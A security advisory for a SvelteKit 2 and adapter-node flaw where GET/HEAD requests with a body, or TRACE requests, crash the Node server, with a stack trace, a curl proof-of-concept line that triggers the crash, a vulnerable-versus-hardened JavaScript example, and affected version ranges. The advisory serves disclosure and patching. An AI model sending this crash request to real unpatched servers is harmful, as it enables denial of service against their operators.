GHSA-g5m6-hxpp-fc49

Source
https://github.com/advisories/GHSA-g5m6-hxpp-fc49
Import Source
https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/01/GHSA-g5m6-hxpp-fc49/GHSA-g5m6-hxpp-fc49.json
JSON Data
https://api.osv.dev/v1/vulns/GHSA-g5m6-hxpp-fc49
Aliases
Related
Published
2024-01-24T14:22:22Z
Modified
2024-01-24T19:13:36Z
Severity
  • 7.5 (High) CVSS_V3 - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
Summary
Sending a GET or HEAD request with a body crashes SvelteKit
Details

Summary

In SvelteKit 2, sending a GET request with a body (e.g. {}) to a SvelteKit app running in preview or with adapter-node throws "Request with GET/HEAD method cannot have body." and crashes the app.

node:internal/deps/undici/undici:6066
          throw new TypeError("Request with GET/HEAD method cannot have body.");
                ^

TypeError: Request with GET/HEAD method cannot have body.
    at new Request (node:internal/deps/undici/undici:6066:17)
    at getRequest (file:///C:/Users/admin/Desktop/reproduction/node_modules/@sveltejs/kit/src/exports/node/index.js:107:9)
    at file:///C:/Users/admin/Desktop/reproduction/node_modules/@sveltejs/kit/src/exports/vite/preview/index.js:181:26
    at call (file:///C:/Users/admin/Desktop/reproduction/node_modules/vite/dist/node/chunks/dep-9A4-l-43.js:44795:7)
    at next (file:///C:/Users/admin/Desktop/reproduction/node_modules/vite/dist/node/chunks/dep-9A4-l-43.js:44739:5)
    at file:///C:/Users/admin/Desktop/reproduction/node_modules/@sveltejs/kit/src/exports/vite/preview/index.js:172:6
    at call (file:///C:/Users/admin/Desktop/reproduction/node_modules/vite/dist/node/chunks/dep-9A4-l-43.js:44795:7)
    at next (file:///C:/Users/admin/Desktop/reproduction/node_modules/vite/dist/node/chunks/dep-9A4-l-43.js:44739:5)
    at file:///C:/Users/admin/Desktop/reproduction/node_modules/@sveltejs/kit/src/exports/vite/preview/index.js:211:27
    at call (file:///C:/Users/admin/Desktop/reproduction/node_modules/vite/dist/node/chunks/dep-9A4-l-43.js:44795:7)

Node.js v20.11.0

TRACE requests will also cause the app to crash. Prerendered pages and SvelteKit 1 apps are not affected.


PoC

First do a fresh install of SvelteKit 2 with the example app (TypeScript).

  1. npm run build
  2. npm run preview
  3. Go to http://localhost:4173 (works)
  4. curl -X GET -d "{}" http://localhost:4173/bye
  5. Application crashes and http://localhost:4173 is down

Impact

Denial of Service for apps using adapter-node
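The failure mode described above, as an added example that is not SvelteKit's own code: a minimal conversion from a Node request to a fetch Request, in the style of the getRequest() step visible in the stack trace, shown in a vulnerable form (forwards the body for any method, so the Request constructor throws a TypeError that nothing catches) and a hardened form (drops the body for GET and HEAD, and converts any remaining TypeError from the constructor, which also covers the forbidden TRACE method, into a 400 response instead of a crash). The function names, the base URL and the string body standing in for the request stream are assumptions; the global Request and Response are those Node 18+ provides via undici.

```javascript
// Added example, not SvelteKit's code. Node 18+ exposes the fetch Request/Response
// globals (backed by undici), which is where the TypeError in the advisory comes from.

// Constructed stand-in for the parts of http.IncomingMessage used below. A real
// implementation would pass a web ReadableStream for the body; a string suffices here.
function makeNodeRequest(method, url, headers, body) {
  return { method, url, headers, body };
}

// Vulnerable form (assumed name): forwards the body regardless of method. For a GET or
// HEAD request that carries a body, new Request(...) throws
// "Request with GET/HEAD method cannot have body."; an uncaught throw here ends the process.
function getRequestVulnerable(base, req) {
  return new Request(base + req.url, {
    method: req.method,
    headers: req.headers,
    body: req.body,
  });
}

// Hardened form (assumed name): the Fetch spec forbids a body on GET and HEAD, so the body
// is discarded for those methods before the Request is built. The try/catch turns any other
// TypeError the constructor raises (e.g. for the forbidden TRACE method) into a 400 response,
// so a single malformed request cannot take the whole server down.
function getRequestHardened(base, req) {
  const method = req.method.toUpperCase();
  const bodyless = method === 'GET' || method === 'HEAD';
  try {
    return new Request(base + req.url, {
      method,
      headers: req.headers,
      body: bodyless ? null : req.body,
    });
  } catch (err) {
    if (err instanceof TypeError) {
      return new Response('Bad Request', { status: 400 });
    }
    throw err;
  }
}

// Stand-alone demonstration on the advisory's own input: GET /bye with body "{}".
function demo() {
  const base = 'http://localhost:4173';
  const probe = makeNodeRequest('GET', '/bye', {}, '{}');
  let vulnerableOutcome;
  try {
    getRequestVulnerable(base, probe);
    vulnerableOutcome = 'no error';
  } catch (err) {
    vulnerableOutcome = `${err.constructor.name}: ${err.message}`;
  }
  const hardened = getRequestHardened(base, probe);
  return {
    vulnerableOutcome,
    hardenedIsRequest: hardened instanceof Request,
    hardenedBodyDropped: hardened instanceof Request && hardened.body === null,
  };
}

console.log(demo());
```

Returning a 400 keeps the bad request visible in access logs, which is the signal a defender wants; a crash only leaves a process-restart trace.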

Database specific
{
    "github_reviewed_at": "2024-01-24T14:22:22Z",
    "cwe_ids": [
        "CWE-20"
    ],
    "nvd_published_at": "2024-01-24T17:15:08Z",
    "severity": "HIGH",
    "github_reviewed": true
}
References

Affected packages

npm / @sveltejs/kit

Package

Name
@sveltejs/kit
Purl
pkg:npm/%40sveltejs/kit

Affected ranges

Type
SEMVER
Events
Introduced
2.0.0
Fixed
2.4.3

npm / @sveltejs/adapter-node

Package

Name
@sveltejs/adapter-node
Purl
pkg:npm/%40sveltejs/adapter-node

Affected ranges

Type
SEMVER
Events
Introduced
2.0.0
Fixed
2.1.2

npm / @sveltejs/adapter-node

Package

Name
@sveltejs/adapter-node
Purl
pkg:npm/%40sveltejs/adapter-node

Affected ranges

Type
SEMVER
Events
Introduced
3.0.0
Fixed
3.0.3

npm / @sveltejs/adapter-node

Package

Name
@sveltejs/adapter-node
Purl
pkg:npm/%40sveltejs/adapter-node

Affected ranges

Type
SEMVER
Events
Introduced
4.0.0
Fixed
4.0.1

Affected versions

4.*

4.0.0